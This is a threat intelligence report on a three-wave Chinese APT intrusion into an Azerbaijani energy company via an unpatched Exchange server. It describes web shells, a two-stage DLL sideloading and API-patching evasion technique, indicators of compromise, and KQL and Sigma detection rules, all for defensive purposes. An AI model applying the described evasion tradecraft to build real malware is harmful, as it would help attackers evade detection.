FamousSparrow Targets Azerbaijani Energy Infrastructure: A Three-Wave Chinese APT Espionage Campaign
Executive Summary
Between December 25, 2025 and late February 2026, the China-linked APT group FamousSparrow conducted three successive intrusion waves against an Azerbaijani oil and gas company — each time returning to the same initial entry point: an unpatched Microsoft Exchange server vulnerable to ProxyNotShell (CVE-2022-41040 / CVE-2022-41082).
This was not opportunistic compromise. The attackers returned after each remediation attempt the victim made, swapping their backdoor payload each time — Deed RAT (wave 1), Terndoor (wave 2), and a modified Deed RAT variant (wave 3) — while retaining persistent access through the same Exchange foothold. The operational discipline demonstrated here is characteristic of long-term, targeted espionage rather than hit-and-run intrusion.
Why Azerbaijan? Following the expiration of Russia's Ukraine gas transit agreement in late 2024 and Strait of Hormuz disruptions in early 2026, Azerbaijan became a strategic gas supplier to 13 European nations, including Germany and Austria. Intelligence collection against energy infrastructure with this level of geopolitical importance is consistent with Chinese state-sponsored espionage objectives.
Immediate action: Organizations running on-premise Microsoft Exchange should verify ProxyNotShell patch status immediately and conduct active threat hunting for web shells in IIS-accessible directories.
Strategic Context: The South Caucasus as Contested Cyber-Espionage Territory
This campaign does not exist in isolation.
In February 2025, Bitdefender Labs documented UAC-0063 (also tracked as TAG-110, assessed with moderate confidence to be linked to Russian APT28/BlueDelta) running an active espionage campaign that started in Central Asia and expanded westward into European diplomatic and government targets. Their toolset centered on HATVIBE loader delivered via weaponized Microsoft Word documents — legitimate documents exfiltrated from Kazakh embassies and then re-weaponized with embedded VBA macro payloads. Post-compromise, the group deployed DownEx (C++) and CHERRYSPY (Python) backdoors for long-term data exfiltration.
The FamousSparrow campaign picks up that narrative one region further west — into the South Caucasus — with a different actor: UAC-0063 is Russia-linked; FamousSparrow is China-linked. Same strategic geography. Same category of high-value target. Two different nation-state actors operating simultaneously.
The picture is consistent: regions experiencing rapid increases in energy and geopolitical significance attract concurrent APT activity from multiple actors, including those that do not typically compete with each other directly.
Azerbaijan's position has materially shifted in the 2025–2026 timeframe. Gas export volumes have grown 56% cumulatively since 2021. The country now supplies energy to 13 European nations. From an espionage targeting perspective, this makes Azerbaijani energy companies a high-priority intelligence collection target for any state actor seeking insight into European energy supply chains.
Attack Timeline
| Date | Event |
|---|---|
| Dec 25, 2025 | w3wp.exe (Exchange IIS worker process) attempts to write web shell to public directory — ProxyNotShell exploitation confirmed |
| Dec 26–29, 2025 | Additional web shells deployed: key.aspx, log.aspx, errorFE_.aspx, signout_.aspx |
| Early January 2026 | Wave 1 — Deed RAT deployed via three-component LogMeIn Hamachi sideloading chain |
| Mid-January 2026 | Victim performs first remediation attempt |
| Late January 2026 | Wave 2 — Attackers return through same Exchange entry point; attempt Terndoor deployment |
| Early February 2026 | Victim performs second remediation attempt |
| Late February 2026 | Wave 3 — Modified Deed RAT variant with updated magic values deployed |
Technical Analysis
Initial Access: ProxyNotShell — A 2022 Vulnerability Still Delivering Results in 2026
ProxyNotShell chains two Microsoft Exchange Server vulnerabilities:
- CVE-2022-41040 — Server-Side Request Forgery (SSRF) enabling authenticated access to internal Exchange endpoints
- CVE-2022-41082 — Remote Code Execution via PowerShell accessible through the SSRF
The exploit chain allows an authenticated attacker — or in some configurations, an unauthenticated attacker — to achieve arbitrary code execution on the Exchange server. The forensic evidence in this case:
w3wp.exespawned under theMSExchangePowerShellAppPoolcontext, writing.aspxfiles to publicly accessible directories.
The significance is not in the sophistication of the initial access. These CVEs have been public and patched since late 2022. The significance is that a well-resourced, state-sponsored actor chose to use it — because it worked. The organization had not fully remediated a three-year-old vulnerability on a production internet-facing server.
Detection indicators:
Process: w3wp.exe
CommandLine contains: MSExchangePowerShellAppPool
Files created in: C:\inetpub\wwwroot\aspnet_client\ or Exchange virtual directories
Filenames: key.aspx, log.aspx, errorFE_.aspx, signout_.aspx
Wave 1: Deed RAT — An Evolved DLL Sideloading Mechanism
Deed RAT is a successor to ShadowPad, a backdoor platform shared across multiple Chinese espionage groups. The variant observed in this campaign introduces meaningful technical evolution.
Three-component deployment chain:
C:\TEMP\LMIGuardianSvc.exe ← Legitimate LogMeIn Hamachi binary (MD5: 0554f3b69d39d175dd110d765c11347a)
C:\TEMP\lmiguardiandll.dll ← Malicious loader
C:\TEMP\.hamachi.lng ← Encrypted Deed RAT payload
After execution, the malware installs to:
C:\Program Files (x86)\LogMeIn Hamachi\
Service name: "LogMeIn Hamachi"
Startup: Automatic
The Two-Stage DLL Sideloading Technique:
Standard DLL sideloading places a malicious DLL adjacent to a legitimate executable. When the executable runs, it loads the DLL — triggering immediate malicious execution. This pattern is well-documented and detected by most modern EDR platforms.
FamousSparrow's implementation works differently. Logic is distributed across two exported functions:
Initexport: Does not execute the payload. Instead, it performs API patching — locatingStartServiceCtrlDispatcherWin memory, temporarily modifying memory protections, preserving the original function bytes, and overwriting the function entry point with a redirect. After completing this setup,Initexits cleanly. The host application continues normal operation.ComMainexport: Later in the application's natural execution flow,LMIGuardianSvc.execallsStartServiceCtrlDispatcherW. Because this API was patched duringInit, the call is transparently redirected into the malicious loader. The loader restores the original API bytes (removing the hook), then proceeds with payload execution from.hamachi.lng. Why this matters for defenders: Automated sandbox analysis typically executes code in partial or out-of-context conditions. Because the payload only activates when the host application follows its complete, natural startup sequence, sandboxes examining code in isolation will observe no malicious behavior. The infection is gated behind legitimate application control flow.
Additional evolution markers in this sample: magic value updated from 0xDEED4554 to 0xFF66ABCD; compression algorithm changed from Snappy to Deflate.
Image: Bitdefender Labs — Two-stage DLL sideloading mechanism in Deed RAT
Wave 2: Terndoor
After the first remediation attempt, the attackers returned through the same Exchange entry point with Terndoor — a separate backdoor family within the FamousSparrow operational toolkit, characterized by driver-backed behavior. The persistence of the web shells, not yet fully eradicated, allowed re-entry.
Wave 3: Modified Deed RAT
The third wave brought a modified Deed RAT variant — updated magic values and changed compression — designed to evade signatures written after the Wave 1 discovery. The same Exchange entry point. The same operational playbook. Different payload.
IOC & Artifacts
# File Hashes
MD5: 0554f3b69d39d175dd110d765c11347a → LMIGuardianSvc.exe (legitimate binary, abused for sideloading)
# File Paths (Staging)
C:\TEMP\LMIGuardianSvc.exe
C:\TEMP\lmiguardiandll.dll
C:\TEMP\.hamachi.lng
# File Paths (Installed)
C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
C:\Program Files (x86)\LogMeIn Hamachi\lmiguardiandll.dll
# Exchange Web Shells
key.aspx
log.aspx
errorFE_.aspx
signout_.aspx
# Windows Service
Service Name: "LogMeIn Hamachi"
Binary Path: C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
Start Type: Automatic
# Deed RAT Behavioral Signatures
Magic Value (new): 0xFF66ABCD (vs 0xDEED4554 in prior samples)
Compression: Deflate (vs Snappy in prior samples)
MITRE ATT&CK Mapping
| Phase | Technique ID | Technique Name | Details |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | ProxyNotShell (CVE-2022-41040 / CVE-2022-41082) on Exchange |
| Persistence | T1505.003 | Web Shell | key.aspx, log.aspx, errorFE_.aspx on Exchange directories |
| Persistence | T1543.003 | Windows Service | "LogMeIn Hamachi" service for Deed RAT persistence |
| Defense Evasion | T1574.002 | DLL Side-Loading | LMIGuardianDll.dll sideloaded via LMIGuardianSvc.exe |
| Defense Evasion | T1562 | Impair Defenses | API patching of StartServiceCtrlDispatcherW |
| Defense Evasion | T1036 | Masquerading | Mimicking LogMeIn Hamachi installation path and service name |
| Command & Control | T1573 | Encrypted Channel | Deed RAT C2 using encrypted communications |
Detection Rules
KQL (Microsoft Sentinel)
// Detect web shell drop from Exchange IIS worker process
SecurityEvent
| where EventID == 4688
| where ParentProcessName contains "w3wp.exe"
| where CommandLine contains "MSExchangePowerShellAppPool"
| where CommandLine matches regex @"\.(aspx|asp|php|jsp)\b"
| project TimeGenerated, Computer, ParentProcessName, NewProcessName, CommandLine
// Detect unexpected DLL loads in LogMeIn Hamachi directory
DeviceImageLoadEvents
| where FolderPath contains @"LogMeIn Hamachi"
| where not(FileName in ("lmiguardiandll.dll", "LMIGuardianSvc.exe"))
or (FileName == "lmiguardiandll.dll" and SHA1 != "<known-good-hash>")
| project Timestamp, DeviceName, FileName, FolderPath, SHA1, InitiatingProcessFileName
// Detect new Windows Service with binary in temp directory
DeviceEvents
| where ActionType == "ServiceInstalled"
| where AdditionalFields contains "C:\\TEMP\\"
or AdditionalFields contains "C:\\Windows\\Temp\\"
| project Timestamp, DeviceName, AdditionalFields
// Hunt for known web shell filenames in Exchange directories
DeviceFileEvents
| where ActionType in ("FileCreated", "FileModified")
| where FileName in ("key.aspx", "log.aspx", "errorFE_.aspx", "signout_.aspx")
| where FolderPath contains "inetpub" or FolderPath contains "Exchange"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessFileName
Sigma Rule
title: FamousSparrow Exchange Web Shell Drop via ProxyNotShell
id: fs-001-exchange-webshell
status: experimental
description: Detects FamousSparrow web shell deployment via ProxyNotShell exploitation
author: SOC Team
date: 2026/05/26
references:
- https://businessinsights.bitdefender.com/famoussparrow-apt-targets-azerbaijani-oil-gas-industry
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|contains: 'w3wp.exe'
CommandLine|contains: 'MSExchangePowerShellAppPool'
TargetFilename|endswith:
- '.aspx'
- '.asp'
condition: selection
falsepositives:
- Legitimate Exchange maintenance workflows (verify with Exchange admin)
level: high
tags:
- attack.initial_access
- attack.t1190
- attack.persistence
- attack.t1505.003
Attribution: FamousSparrow and the Earth Estries Ecosystem
Bitdefender attributes this intrusion to FamousSparrow with moderate-to-high confidence. The assessment is based on the convergence of multiple evidence streams:
- Exchange exploitation via ProxyNotShell (T1190) followed by web shell establishment (T1505.003)
- DLL sideloading pattern with two-stage execution gating (T1574.002)
- Deed RAT — a malware family with documented links to FamousSparrow operations
- Mofu-based payload staging
- Terndoor behavioral characteristics FamousSparrow overlaps significantly with the Earth Estries and Salt Typhoon activity clusters. Prior public reporting from Cisco Talos, Trend Micro, Microsoft, and ESET documents this overlap. When viewed as an ecosystem rather than a single actor, these clusters share tooling, infrastructure practices, and targeting patterns while maintaining distinct operational cells.
Previously documented FamousSparrow targets: telecoms, government entities, technology sectors across the US, Asia-Pacific, Middle East, and South Africa. This campaign represents the first public documentation of this activity cluster targeting energy infrastructure in the South Caucasus.
Expert Assessment
On the technical tradecraft:
The three-wave intrusion pattern reveals a critical operational security lesson: patching a vulnerability does not mean an incident is over. Once web shells are established on an Exchange server, they provide independent persistence that survives Exchange patching. The victim patched twice. The attacker returned twice. The web shell was the durable mechanism.
The two-stage DLL sideloading technique is a meaningful defensive capability upgrade. It does not require kernel access, does not modify any legitimate binary, and does not need elevated privileges beyond what the legitimate application already holds. Its anti-analysis property — gating payload execution behind legitimate application startup sequences — creates genuine detection gaps in sandbox-based analysis platforms that examine code out of context.
The update from magic value 0xDEED4554 to 0xFF66ABCD and the compression switch from Snappy to Deflate between waves indicate active development activity during the intrusion campaign itself. This actor was watching whether their tools were detected and iterating accordingly.
On the broader pattern:
Viewed alongside the UAC-0063 research (February 2025), a clear pattern emerges: both Russia-aligned and China-aligned threat actors are actively intensifying espionage operations in regions experiencing rapid increases in strategic energy importance. This is not coincidence — it reflects deliberate intelligence collection priorities responding to geopolitical shifts.
For organizations in Southeast Asia, including Vietnam, the relevance is not as a direct targeting geography in this campaign. The relevance is that FamousSparrow belongs to an ecosystem (Earth Estries / Salt Typhoon) that has documented targeting of Southeast Asian telecommunications infrastructure. TTPs demonstrated in this Azerbaijani campaign are likely to appear in future operations across the region.
Recommendations
Immediate (0–24h)
- Verify Exchange patch status for CVE-2022-41040 and CVE-2022-41082 across all on-premise Exchange servers:
Get-ExchangeServer | fl Name, AdminDisplayVersion # Minimum required: Exchange 2019 CU12+ with Oct 2022 SU, Exchange 2016 CU23+ with Oct 2022 SU - Hunt for web shells in Exchange and IIS-accessible directories:
Get-ChildItem -Path "C:\inetpub\" -Recurse -Include "*.aspx" | ` Where-Object {$_.CreationTime -gt (Get-Date).AddDays(-90)} | ` Select-Object FullName, CreationTime, LastWriteTime - Scan for known IOCs — file names
key.aspx,log.aspx,errorFE_.aspx,signout_.aspxand MD5 hash0554f3b69d39d175dd110d765c11347a— across SIEM/EDR telemetry.
Short-term (1–7 days)
- Deploy the detection rules (KQL/Sigma) provided above in your SIEM environment.
- Audit recently created Windows Services — flag any service with a binary path under
C:\TEMP\or one mimicking known legitimate software names. - Enable enhanced Exchange logging for the
MSExchangePowerShellAppPoolcontext; alert on file creation events fromw3wp.exe. - Hunt DLL sideloading patterns — identify cases where legitimate binaries are loading DLLs from non-standard paths.
Long-term
- Eliminate Exchange on-premises exposure where business requirements permit. Migration to Exchange Online removes the entire ProxyNotShell / ProxyShell attack surface.
- Network segmentation for Exchange servers — Exchange servers should not have unrestricted outbound internet connectivity.
- Establish periodic threat hunting cycles — build hypotheses from regional APT TTPs and run structured hunts quarterly.
- Validate EDR detection coverage for DLL sideloading and API hooking specifically — many platforms have non-trivial false negative rates against techniques that don't produce immediately visible process injection.
